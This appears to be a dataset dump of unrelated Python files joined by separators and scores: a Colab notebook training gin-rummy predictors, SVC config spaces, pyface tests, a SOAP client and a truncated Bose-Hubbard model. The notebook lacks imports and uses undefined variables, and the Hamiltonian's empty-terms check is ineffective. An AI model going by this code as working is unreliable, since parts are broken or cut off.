from sklearn.model_selection import train_test_split
import tensorflow as tf
import tensorflow.python.keras.backend as K
from tensorflow.python.keras import Input
from tensorflow.python.keras.models import Sequential, Model, model_from_yaml, load_model
from tensorflow.python.keras.layers import Dense, Flatten, Conv2D, LeakyReLU, concatenate, Dropout
from tensorflow.python.keras.callbacks import Callback, EarlyStopping, LearningRateScheduler, TensorBoard
# Data generator
class DataGenerator(tf.keras.utils.Sequence):
'Generates data for tf.keras'
def __init__(self, batch_size = 64, shuffle = True, datasettype = 'train', permFreq = 0.15, output_type = 'win'):
'Initialization'
self.datasettype = datasettype
if datasettype == 'train':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/train.csv'
elif datasettype == 'val':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/val.csv'
elif datasettype == 'test':
self.link = 'gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/test.csv'
else:
print("Incorrect datatype")
self.xy = np.loadtxt(self.link, delimiter = ",", dtype = np.float32, skiprows = 1)
np.random.shuffle(self.xy) # Shuffle dataset
self.y = self.xy[:, [0]]
self.f = self.xy[:, 1:6]
self.x = self.xy[:, 6:58]
self.x = self.x.reshape((-1,4,13,1))
self.g = self.xy[:, 58:184]
self.o = self.xy[:, 184:236]
self.o = self.o.reshape((-1,4,13,1))
self.dim = (4,13)
self.batch_size = batch_size
self.shuffle = shuffle
self.indexes = np.arange(self.xy.shape[0])
self.on_epoch_end()
self.permFreq = permFreq
self.output_type = output_type
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(self.xy.shape[0] / self.batch_size))
def __getitem__(self, index_batch):
'Generate one batch of data'
# Generate indexes of the batch
indexes_batch = self.indexes[index_batch*self.batch_size:(index_batch+1)*self.batch_size]
# Generate data
[x, f, g, o], y = self.__data_generation(indexes_batch)
return [x, f, g, o], y
def on_epoch_end(self):
'Updates indexes after each epoch'
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, indexes):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
x = np.empty((self.batch_size, 4,13,1))
f = np.empty((self.batch_size, 5))
g = np.empty((self.batch_size, 126))
o = np.empty((self.batch_size, 4,13,1))
y = np.empty((self.batch_size))
# Generate data
for i, index in enumerate(indexes):
# Random permutation for x and o
r = random.random()
if r < (1-self.permFreq):
x[i,] = self.x[index,]
o[i,] = self.o[index,]
else:
x[i,] = np.array([np.random.permutation(self.x[index,0,])])
o[i,] = np.array([np.random.permutation(self.o[index,0,])])
# f and g
f[i,] = self.f[index,]
g[i,] = self.g[index,]
# output type
if self.output_type == 'win':
if self.y[index,] > 0:
y[i ] = 1
else:
y[i ] = 0
elif self.output_type == 'score':
y[i ] = self.y[index,]
else:
print('Invalid input type')
return [x, f, g, o], y
# TensorBoard
log_dir = "logs/fit/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir = log_dir, histogram_freq = 1)
# Checkpoint callback
checkpoint_path = "gdrive/My Drive/Colab Notebooks/GR-TrainModel/Checkpoint/cp.ckpt"
checkpoint_dir = os.path.dirname(checkpoint_path)
cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,
save_weights_only=True,
verbose=1,
save_freq = 'epoch')
# Step Decay
def step_decay_schedule(initial_lr=1e-3, decay_factor=0.75, step_size=10):
def schedule(epoch):
return initial_lr * (decay_factor ** np.floor(epoch/step_size))
return LearningRateScheduler(schedule)
schedule = step_decay_schedule(initial_lr = 0.001, decay_factor=0.1, step_size = 50)
# Data generator
train_generator = DataGenerator(datasettype = 'train', batch_size = 128, permFreq = 0, output_type = 'score')
valid_generator = DataGenerator(datasettype = 'val', batch_size = 128, permFreq = 0, output_type = 'score')
def DualInception():
x = Input(shape = (4,13,1,), name = 'x')
f = Input(shape = (5,), name = 'f')
g = Input(shape = (126,), name = 'g')
o = Input(shape = (4,13,1,), name = 'o')
# x1 = Flatten(name = 'xflatten')(x)
# o1 = Flatten(name = 'oflatten')(o)
# i = concatenate([x1, f, g, o1], name = 'concat')
y = Dense(1, name = 'y')(f)
model = Model(inputs = [x, f, g, o], outputs = y)
# model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'])
model.compile(loss = 'mse', optimizer = 'adam')
return model
# Commented out IPython magic to ensure Python compatibility.
!rm -rf ./logs/
# %load_ext tensorboard
# %tensorboard --logdir logs/fit
# Model define
NN = DualInception()
NN.summary()
history_NN = NN.fit(x = train_generator,
validation_data = valid_generator,
epochs = 10,
callbacks = [cp_callback, schedule, tensorboard_callback])
test_generator = DataGenerator(datasettype = 'test', batch_size = 128, permFreq = 0, output_type = 'score')
NN.evaluate(test_generator)
"""# **Other model**"""
import matplotlib.pyplot as plt
data2 = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/small_Simple_Last_OHE_noDup_ISRU_geo.csv')
geo = data.iloc[:,58:184]
sumgeo = geo.sum(axis = 1)
sumgeo = np.array(sumgeo).reshape(-1,1)
deadwood = data.Deadwood0
deadwood = np.array(deadwood).reshape(-1,1)
X = np.concatenate((sumgeo,deadwood),axis=1)
model = svm.SVC(probability=True)
model.fit(X, Y)
testDeadwood = np.arange(0, 100)
testDeadwood = testDeadwood.reshape(-1,1)
testGeo = np.full((100, 1), 5, dtype=int)
testX = np.concatenate((testGeo, testDeadwood), axis=1)
testY = model.predict(testX)
plt.plot(testDeadwood, testY)
testDeadwood = np.full((40, 1), 15, dtype=int)
testGeo = np.arange(0, 40)
testGeo = testGeo.reshape(-1,1)
testX = np.concatenate((testGeo, testDeadwood), axis=1)
testY = model.predict(testX)
plt.plot(testGeo, testY)
from sklearn import svm
X = data.Deadwood0
Y = data.win
X = np.array(X).reshape(-1, 1)
model = svm.SVC(probability=True)
model.fit(X, Y)
Yhat = model.predict(X)
1 - sum(Yhat - Y)/16317
testX = np.arange(0, 100)
testX = testX.reshape(-1,1)
testY = model.predict(testX)
model.predict_proba(testX)
plt.plot(testX, testY)
plt.scatter(X, Y)
data["win"] = np.nan
data.loc[data["score0_mean"] > 0 , "win"] = 1
data.loc[data["score0_mean"] <= 0 , "win"] = 0
data
data.describe()
corr_matrix = data.corr()
a = corr_matrix['win']
print(a.sort_values().index)
for i in a.sort_values():
print(i)
import matplotlib.pyplot as plt
plt.figure(figsize=(60,7))
plt.plot(a)
import seaborn as sn
sn.heatmap(a, annot=True)
plt.show()
data = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/1M_Simple_All_OHE_noDup_ISRU_geo_val.csv')
data["win"] = np.nan
data.loc[data["score0_mean"] > 0 , "win"] = 1
data.loc[data["score0_mean"] <= 0 , "win"] = 0
y = np.array(data.win)
y
# f = np.array(data[['GamestateNum', 'RunNum0', 'SetNum0', 'Deadwood0', 'Hitscore0']])
f = np.array(data[['Deadwood0']])
data
f
y
y = y.reshape((-1,1))
model = svm.SVC(probability=True)
model.fit(f, y)
def DualInception():
f = Input(shape = (1,), name = 'f')
h = Dense(8, activation = 'sigmoid', name = 'h')(f)
y = Dense(1, activation = 'sigmoid', name = 'y')(h)
model = Model(inputs = f, outputs = y)
model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'])
return model
# Model define
NN = DualInception()
NN.summary()
history_NN = NN.fit(x = f,
y = y,
epochs = 10)
test.columns
GamestateNumTest = np.full((100, 1), 5, dtype=int)
RunNum0Test = np.full((100, 1), 1, dtype=int)
SetNum0Test = np.full((100, 1), 1, dtype=int)
Deadwood0Test = np.arange(0, 100)
Deadwood0Test = Deadwood0Test.reshape(-1,1)
Hitscore0Test = np.full((100, 1), 10, dtype=int)
testX = np.concatenate((GamestateNumTest, RunNum0Test, SetNum0Test, Deadwood0Test, Hitscore0Test), axis=1)
testY = NN.predict(testX)
data = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/2M_Simple_All_OHE_randomplayer_nodup_ISRU_geo.csv')
data.describe()
data2 = pd.read_csv('gdrive/My Drive/Colab Notebooks/GR-TrainModel/Alucard/small_Simple_Last_OHE_noDup_ISRU_geo.csv')
plt.figure(figsize=(15,7))
plt.scatter(data2.Deadwood0, data2.score0_mean)
plt.figure(figsize=(15,7))
plt.scatter(data.Deadwood0, data.score0_mean)
plt.figure(figsize=(15,7))
plt.scatter(data.Hitscore0, data.score0_mean) | 0.693265 | 0.29022 |
import ConfigSpace
def get_hyperparameter_search_space_small(seed):
"""
Small version of svm config space, featuring important hyperparameters
based on https://arxiv.org/abs/1710.04725
Parameters
----------
seed: int
Random seed that will be used to sample random configurations
Returns
-------
cs: ConfigSpace.ConfigurationSpace
The configuration space object
"""
cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)
C = ConfigSpace.UniformFloatHyperparameter(
name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)
kernel = ConfigSpace.CategoricalHyperparameter(
name='svc__kernel', choices=['rbf', 'poly', 'sigmoid'], default_value='rbf')
degree = ConfigSpace.UniformIntegerHyperparameter(
name='svc__degree', lower=1, upper=5, default_value=3)
gamma = ConfigSpace.UniformFloatHyperparameter(
name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)
coef0 = ConfigSpace.UniformFloatHyperparameter(
name='svc__coef0', lower=-1, upper=1, default_value=0)
cs.add_hyperparameters([
C,
kernel,
degree,
gamma,
coef0
])
degree_depends_on_poly = ConfigSpace.EqualsCondition(degree, kernel, 'poly')
coef0_condition = ConfigSpace.InCondition(coef0, kernel, ['poly', 'sigmoid'])
cs.add_condition(degree_depends_on_poly)
cs.add_condition(coef0_condition)
return cs
def get_hyperparameter_search_space_micro(seed):
"""
Small version of svm config space, featuring important hyperparameters
as used by:
http://metalearning.ml/2018/papers/metalearn2018_paper70.pdf
Parameters
----------
seed: int
Random seed that will be used to sample random configurations
Returns
-------
cs: ConfigSpace.ConfigurationSpace
The configuration space object
"""
cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)
kernel = ConfigSpace.Constant(name='svc__kernel', value='rbf')
C = ConfigSpace.UniformFloatHyperparameter(name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)
gamma = ConfigSpace.UniformFloatHyperparameter(
name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)
cs.add_hyperparameters([
kernel,
C,
gamma
])
return cs | openmldefaults/config_spaces/svc.py | import ConfigSpace
def get_hyperparameter_search_space_small(seed):
"""
Small version of svm config space, featuring important hyperparameters
based on https://arxiv.org/abs/1710.04725
Parameters
----------
seed: int
Random seed that will be used to sample random configurations
Returns
-------
cs: ConfigSpace.ConfigurationSpace
The configuration space object
"""
cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)
C = ConfigSpace.UniformFloatHyperparameter(
name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)
kernel = ConfigSpace.CategoricalHyperparameter(
name='svc__kernel', choices=['rbf', 'poly', 'sigmoid'], default_value='rbf')
degree = ConfigSpace.UniformIntegerHyperparameter(
name='svc__degree', lower=1, upper=5, default_value=3)
gamma = ConfigSpace.UniformFloatHyperparameter(
name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)
coef0 = ConfigSpace.UniformFloatHyperparameter(
name='svc__coef0', lower=-1, upper=1, default_value=0)
cs.add_hyperparameters([
C,
kernel,
degree,
gamma,
coef0
])
degree_depends_on_poly = ConfigSpace.EqualsCondition(degree, kernel, 'poly')
coef0_condition = ConfigSpace.InCondition(coef0, kernel, ['poly', 'sigmoid'])
cs.add_condition(degree_depends_on_poly)
cs.add_condition(coef0_condition)
return cs
def get_hyperparameter_search_space_micro(seed):
"""
Small version of svm config space, featuring important hyperparameters
as used by:
http://metalearning.ml/2018/papers/metalearn2018_paper70.pdf
Parameters
----------
seed: int
Random seed that will be used to sample random configurations
Returns
-------
cs: ConfigSpace.ConfigurationSpace
The configuration space object
"""
cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)
kernel = ConfigSpace.Constant(name='svc__kernel', value='rbf')
C = ConfigSpace.UniformFloatHyperparameter(name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)
gamma = ConfigSpace.UniformFloatHyperparameter(
name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)
cs.add_hyperparameters([
kernel,
C,
gamma
])
return cs | 0.870556 | 0.382891 |
import pkg_resources
import unittest
import pyface.toolkit
class TestToolkit(unittest.TestCase):
def test_missing_import(self):
# test that we get an undefined object if no toolkit implementation
cls = pyface.toolkit.toolkit_object('tests:Missing')
with self.assertRaises(NotImplementedError):
obj = cls()
def test_bad_import(self):
# test that we don't filter unrelated import errors
with self.assertRaises(ImportError):
cls = pyface.toolkit.toolkit_object('tests.bad_import:Missing')
def test_core_plugins(self):
# test that we can see appropriate core entrypoints
plugins = set(entry_point.name for entry_point in
pkg_resources.iter_entry_points('pyface.toolkits'))
self.assertLessEqual({'qt4', 'wx', 'qt', 'null'}, plugins)
def test_toolkit_object(self):
# test that the Toolkit class works as expected
# note that if this fails many other things will too
from pyface.tests.test_new_toolkit.init import toolkit_object
from pyface.tests.test_new_toolkit.widget import Widget as TestWidget
Widget = toolkit_object('widget:Widget')
self.assertEqual(Widget, TestWidget)
def test_toolkit_object_overriden(self):
# test that the Toolkit class search paths can be overridden
from pyface.tests.test_new_toolkit.widget import Widget as TestWidget
toolkit_object = pyface.toolkit.toolkit_object
old_packages = toolkit_object.packages
toolkit_object.packages = ['pyface.tests.test_new_toolkit'] + old_packages
try:
Widget = toolkit_object('widget:Widget')
self.assertEqual(Widget, TestWidget)
finally:
toolkit_object.packages = old_packages
def test_toolkit_object_not_overriden(self):
# test that the Toolkit class works when object not overridden
toolkit_object = pyface.toolkit.toolkit_object
TestWindow = toolkit_object('window:Window')
old_packages = toolkit_object.packages
toolkit_object.packages = ['pyface.tests.test_new_toolkit'] + old_packages
try:
Window = toolkit_object('window:Window')
self.assertEqual(Window, TestWindow)
finally:
toolkit_object.packages = old_packages | Latest/venv/Lib/site-packages/pyface/tests/test_toolkit.py | import pkg_resources
import unittest
import pyface.toolkit
class TestToolkit(unittest.TestCase):
def test_missing_import(self):
# test that we get an undefined object if no toolkit implementation
cls = pyface.toolkit.toolkit_object('tests:Missing')
with self.assertRaises(NotImplementedError):
obj = cls()
def test_bad_import(self):
# test that we don't filter unrelated import errors
with self.assertRaises(ImportError):
cls = pyface.toolkit.toolkit_object('tests.bad_import:Missing')
def test_core_plugins(self):
# test that we can see appropriate core entrypoints
plugins = set(entry_point.name for entry_point in
pkg_resources.iter_entry_points('pyface.toolkits'))
self.assertLessEqual({'qt4', 'wx', 'qt', 'null'}, plugins)
def test_toolkit_object(self):
# test that the Toolkit class works as expected
# note that if this fails many other things will too
from pyface.tests.test_new_toolkit.init import toolkit_object
from pyface.tests.test_new_toolkit.widget import Widget as TestWidget
Widget = toolkit_object('widget:Widget')
self.assertEqual(Widget, TestWidget)
def test_toolkit_object_overriden(self):
# test that the Toolkit class search paths can be overridden
from pyface.tests.test_new_toolkit.widget import Widget as TestWidget
toolkit_object = pyface.toolkit.toolkit_object
old_packages = toolkit_object.packages
toolkit_object.packages = ['pyface.tests.test_new_toolkit'] + old_packages
try:
Widget = toolkit_object('widget:Widget')
self.assertEqual(Widget, TestWidget)
finally:
toolkit_object.packages = old_packages
def test_toolkit_object_not_overriden(self):
# test that the Toolkit class works when object not overridden
toolkit_object = pyface.toolkit.toolkit_object
TestWindow = toolkit_object('window:Window')
old_packages = toolkit_object.packages
toolkit_object.packages = ['pyface.tests.test_new_toolkit'] + old_packages
try:
Window = toolkit_object('window:Window')
self.assertEqual(Window, TestWindow)
finally:
toolkit_object.packages = old_packages | 0.433022 | 0.390883 |
from zeep import Client
c = Client('http://localhost:8000?wsdl')
def get_header():
return c.get_type('ns0:Header')(
Message_Type='mt',
Company_ID='ci',
Version='v',
Source='s',
Destination='d',
Action_Type='read',
Sequence_Number='1',
Batch_ID='bi',
Reference_ID='ri',
Msg_Locale='ml',
Msg_Time_Zone='mtz',
Internal_Date_Time_Stamp='idts'
)
def send_receive_item_bar_code():
message = c.get_type('ns0:Message')(
ItemBarCodeList=c.get_type('ns0:ItemBarCodeList')(
ItemBarCode=[
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
ItemCode='ic',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
),
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
ItemCode='ic',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
),
]
)
)
tXml = c.get_type('ns0:TXml')(Header=get_header(), Message=message)
c.service.receiveItemBarCode(tXml=tXml)
def send_receive_item_master():
message = c.get_type('ns0:Message')(
Item=c.get_type('ns0:Item')(
ItemCode='ic',
IsStyle='is',
ActionType='at',
ActivationDate='ad',
TargetExclusive='te',
OnlineExclusive='oe',
EssentialItem='ei',
LongDescription='ld',
ShortDescription='sd',
PrimaryBarcode='pb',
HazmatCode='hc',
BulkyItem='bi',
ItemWeight='iw',
ItemHeight='ih',
ItemLength='il',
ItemWidth='iw',
ItemVolume='iv',
WeightUOM='wu',
DimensionUOM='du',
VolumeUOM='vu',
IsPerishable='ip',
ItemPackageList=c.get_type('ns0:ItemPackageList')(
ItemPackage=[
c.get_type('ns0:ItemPackage')(
PackageType='pt',
Description='d',
Quantity='q',
UnitWeight='uw',
UnitWidth='uw',
UnitLength='ul',
UnitHeight='uh',
UnitVolume='uv',
WeigthUOM='wu',
DimensionUOM='du',
VolumeUOM='vu',
IsPrimary='ip',
BusinessPartnerNumber='bpn',
Ti='ti',
Hi='hi',
),
]
),
ProductHeirarchy=c.get_type('ns0:ProductHeirarchy')(
Variant='v',
Product='p',
MerchandiseStyle='ms',
Range='r',
MajorClass='mc',
ClassGroup='cg',
Department='d',
BusinessGroup='bg',
Section='s',
Company='c',
),
ItemBarCodeList=c.get_type('ns0:ItemBarCodeList')(
ItemBarCode=[
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
),
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
),
]
),
PerishableAttribute=c.get_type('ns0:PerishableAttribute')(
ShelfDays='sd',
ExpireDateReqd='edr',
MinReceivedToExpireDays='mrted',
MaxReceivedToExpireDays='mrted',
),
WarehouseAttributes=c.get_type('ns0:WarehouseAttributes')(
SecureProduct='sp',
Conveyable='c',
PutawayType='pt',
CrushCode='cc',
VolatilityCode='vc',
),
Slotting=[
c.get_type('ns0:Slotting')(
LocationCode='lc',
SlottingRequired='sr',
),
c.get_type('ns0:Slotting')(
LocationCode='lc',
SlottingRequired='sr',
),
],
ItemPromotion=c.get_type('ns0:ItemPromotion')(
OnPromo='op',
PromoStartWeek='psw',
),
ItemAttributes=[
c.get_type('ns0:ItemAttributes')(
AttributeTypeId='ati',
AttributeTypeDesc='atd',
AttributeHeaderId='ahi',
AttributeHeaderDesc='ahd',
AttributeCodeId='aci',
AttributeCode='ac',
AttributeCodeDesc='acd',
),
c.get_type('ns0:ItemAttributes')(
AttributeTypeId='ati',
AttributeTypeDesc='atd',
AttributeHeaderId='ahi',
AttributeHeaderDesc='ahd',
AttributeCodeId='aci',
AttributeCode='ac',
AttributeCodeDesc='acd',
),
],
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
)
)
tXml = c.get_type('ns0:TXml')(Header=get_header(), Message=message)
c.service.receiveItemMaster(tXml=tXml)
send_receive_item_bar_code()
send_receive_item_master() | util/client.py | from zeep import Client
c = Client('http://localhost:8000?wsdl')
def get_header():
return c.get_type('ns0:Header')(
Message_Type='mt',
Company_ID='ci',
Version='v',
Source='s',
Destination='d',
Action_Type='read',
Sequence_Number='1',
Batch_ID='bi',
Reference_ID='ri',
Msg_Locale='ml',
Msg_Time_Zone='mtz',
Internal_Date_Time_Stamp='idts'
)
def send_receive_item_bar_code():
message = c.get_type('ns0:Message')(
ItemBarCodeList=c.get_type('ns0:ItemBarCodeList')(
ItemBarCode=[
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
ItemCode='ic',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
),
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
ItemCode='ic',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
),
]
)
)
tXml = c.get_type('ns0:TXml')(Header=get_header(), Message=message)
c.service.receiveItemBarCode(tXml=tXml)
def send_receive_item_master():
message = c.get_type('ns0:Message')(
Item=c.get_type('ns0:Item')(
ItemCode='ic',
IsStyle='is',
ActionType='at',
ActivationDate='ad',
TargetExclusive='te',
OnlineExclusive='oe',
EssentialItem='ei',
LongDescription='ld',
ShortDescription='sd',
PrimaryBarcode='pb',
HazmatCode='hc',
BulkyItem='bi',
ItemWeight='iw',
ItemHeight='ih',
ItemLength='il',
ItemWidth='iw',
ItemVolume='iv',
WeightUOM='wu',
DimensionUOM='du',
VolumeUOM='vu',
IsPerishable='ip',
ItemPackageList=c.get_type('ns0:ItemPackageList')(
ItemPackage=[
c.get_type('ns0:ItemPackage')(
PackageType='pt',
Description='d',
Quantity='q',
UnitWeight='uw',
UnitWidth='uw',
UnitLength='ul',
UnitHeight='uh',
UnitVolume='uv',
WeigthUOM='wu',
DimensionUOM='du',
VolumeUOM='vu',
IsPrimary='ip',
BusinessPartnerNumber='bpn',
Ti='ti',
Hi='hi',
),
]
),
ProductHeirarchy=c.get_type('ns0:ProductHeirarchy')(
Variant='v',
Product='p',
MerchandiseStyle='ms',
Range='r',
MajorClass='mc',
ClassGroup='cg',
Department='d',
BusinessGroup='bg',
Section='s',
Company='c',
),
ItemBarCodeList=c.get_type('ns0:ItemBarCodeList')(
ItemBarCode=[
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
),
c.get_type('ns0:ItemBarCode')(
IsPrimary='ip',
Barcode='b',
Quantity='q',
ActionType='at',
BarcodeType='bt',
),
]
),
PerishableAttribute=c.get_type('ns0:PerishableAttribute')(
ShelfDays='sd',
ExpireDateReqd='edr',
MinReceivedToExpireDays='mrted',
MaxReceivedToExpireDays='mrted',
),
WarehouseAttributes=c.get_type('ns0:WarehouseAttributes')(
SecureProduct='sp',
Conveyable='c',
PutawayType='pt',
CrushCode='cc',
VolatilityCode='vc',
),
Slotting=[
c.get_type('ns0:Slotting')(
LocationCode='lc',
SlottingRequired='sr',
),
c.get_type('ns0:Slotting')(
LocationCode='lc',
SlottingRequired='sr',
),
],
ItemPromotion=c.get_type('ns0:ItemPromotion')(
OnPromo='op',
PromoStartWeek='psw',
),
ItemAttributes=[
c.get_type('ns0:ItemAttributes')(
AttributeTypeId='ati',
AttributeTypeDesc='atd',
AttributeHeaderId='ahi',
AttributeHeaderDesc='ahd',
AttributeCodeId='aci',
AttributeCode='ac',
AttributeCodeDesc='acd',
),
c.get_type('ns0:ItemAttributes')(
AttributeTypeId='ati',
AttributeTypeDesc='atd',
AttributeHeaderId='ahi',
AttributeHeaderDesc='ahd',
AttributeCodeId='aci',
AttributeCode='ac',
AttributeCodeDesc='acd',
),
],
Extensions=[
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
c.get_type('ns0:Extensions')(
FieldCode='fc',
FieldCodeDesc='fcd',
FieldValue='fv'
),
]
)
)
tXml = c.get_type('ns0:TXml')(Header=get_header(), Message=message)
c.service.receiveItemMaster(tXml=tXml)
send_receive_item_bar_code()
send_receive_item_master() | 0.493897 | 0.089137 |
from typing import List
import numpy
from mlxtk import dvr
from mlxtk.log import get_logger
from mlxtk.parameters import Parameters
from mlxtk.tasks import MBOperatorSpecification, OperatorSpecification
class BoseHubbard:
def __init__(self, parameters: Parameters):
self.parameters = parameters
self.grid = dvr.add_sinedvr(parameters.sites, 0, parameters.sites - 1)
self.logger = get_logger(__name__ + ".BoseHubbard")
@staticmethod
def create_parameters() -> Parameters:
return Parameters(
[
("sites", 4, "number of sites"),
("N", 4, "number of particles"),
("m", 4, "number of SPFs"),
("J", 1.0, "hopping constant"),
("U", 1.0, "interaction strength"),
("pbc", True, "whether to use periodic boundary conditions"),
]
)
def create_hopping_term(self) -> MBOperatorSpecification:
matrix = numpy.zeros((self.parameters.sites, self.parameters.sites))
for i in range(self.parameters.sites - 1):
matrix[i, i + 1] = 1.0
matrix[i + 1, i] = 1.0
if self.parameters.pbc:
matrix[0, -1] = 1.0
matrix[-1, 0] = 1.0
return MBOperatorSpecification(
(1,),
(self.grid,),
{
"hopping_coeff": -self.parameters.J,
},
{"hopping": matrix},
"hopping_coeff | 1 hopping",
)
def create_correlator(self, site_a: int, site_b: int) -> MBOperatorSpecification:
matrix = numpy.zeros((self.parameters.sites, self.parameters.sites))
matrix[site_a, site_b] = 1.0
return MBOperatorSpecification(
(1,),
(self.grid,),
{"correlator_coeff": 1.0},
{"correlator": matrix},
"correlator_coeff | 1 correlator",
)
def create_interaction_term(self) -> MBOperatorSpecification:
def create_delta_peak(n: int, i: int) -> numpy.ndarray:
result = numpy.zeros(n)
result[i] = 1.0
return result
n = self.grid.get().npoints
return MBOperatorSpecification(
(1,),
(self.grid,),
{"interaction_coeff": self.parameters.U},
{f"interaction_term_{i}": create_delta_peak(n, i) for i in range(n)},
[
"interaction_coeff | 1 interaction_term_{} | 1* interaction_term_{}".format(
i, i
)
for i in range(n)
],
)
def get_site_occupation_operator(self, site_index: int) -> MBOperatorSpecification:
term = numpy.zeros(self.grid.get().npoints)
term[site_index] = 1
return MBOperatorSpecification(
(1,),
(self.grid,),
{"site_occupation_coeff": 1.0},
{"site_occupation": term},
"site_occupation_coeff | 1 site_occupation",
)
def get_site_occupation_operator_squared(
self, site_index: int
) -> MBOperatorSpecification:
term = numpy.zeros(self.grid.get().npoints)
term[site_index] = 1
return MBOperatorSpecification(
(1,),
(self.grid,),
{"site_occupation_coeff_1": 1.0, "site_occupation_coeff_2": 2.0},
{"site_occupation": term},
[
"site_occupation_coeff_1 | 1 site_occupation",
"site_occupation_coeff_2 | 1 site_occupation | 1* site_occupation",
],
)
def get_site_occupation_pair_operator(
self, site_index_1: int, site_index_2: int
) -> MBOperatorSpecification:
n = self.grid.get().npoints
term_1 = numpy.zeros(n)
term_1[site_index_1] = 1
term_2 = numpy.zeros(n)
term_2[site_index_2] = 1
terms = {"site_occupation_pair_1": term_1, "site_occupation_pair_2": term_2}
coefficients = {"site_occupation_pair_2b_coeff": 2.0}
table = [
"site_occupation_pair_2b_coeff | 1 site_occupation_pair_1 | 1* site_occupation_pair_2"
]
if site_index_1 == site_index_2:
coefficients["site_occupation_pair_1b_coeff"] = 1.0
table.append("site_occupation_pair_1b_coeff | 1 site_occupation_pair_1")
return MBOperatorSpecification((1,), (self.grid,), coefficients, terms, table)
def get_hamiltonian(self) -> MBOperatorSpecification:
terms: List[MBOperatorSpecification] = []
if self.parameters.J != 0.0:
terms.append(self.create_hopping_term())
if self.parameters.U != 0.0:
terms.append(self.create_interaction_term())
if terms is None:
raise RuntimeError("Hamiltonian would be empty since both J and U are 0.0")
operator = terms[0]
for term in terms[1:]:
operator += term
return operator
def get_fake_initial_state_hamiltonian(self) -> OperatorSpecification:
n = self.grid.get().npoints
mat = numpy.zeros((n, n), dtype=numpy.float64)
for i in range(n):
mat[i, i] = i
return OperatorSpecification(
(self.grid,),
{
"coeff": 1,
},
{
"matrix": mat,
},
"coeff | 1 matrix",
)
def distribute_particles(self) -> numpy.ndarray:
ns = numpy.zeros(self.parameters.m)
loc = 0
for _ in range(self.parameters.N):
ns[loc] += 1
loc = (loc + 1) % self.parameters.m
assert numpy.sum(ns) == self.parameters.N
return ns | mlxtk/systems/single_species/bose_hubbard.py | from typing import List
import numpy
from mlxtk import dvr
from mlxtk.log import get_logger
from mlxtk.parameters import Parameters
from mlxtk.tasks import MBOperatorSpecification, OperatorSpecification
class BoseHubbard:
def __init__(self, parameters: Parameters):
self.parameters = parameters
self.grid = dvr.add_sinedvr(parameters.sites, 0, parameters.sites - 1)
self.logger = get_logger(__name__ + ".BoseHubbard")
@staticmethod
def create_parameters() -> Parameters:
return Parameters(
[
("sites", 4, "number of sites"),
("N", 4, "number of particles"),
("m", 4, "number of SPFs"),
("J", 1.0, "hopping constant"),
("U", 1.0, "interaction strength"),
("pbc", True, "whether to use periodic boundary conditions"),
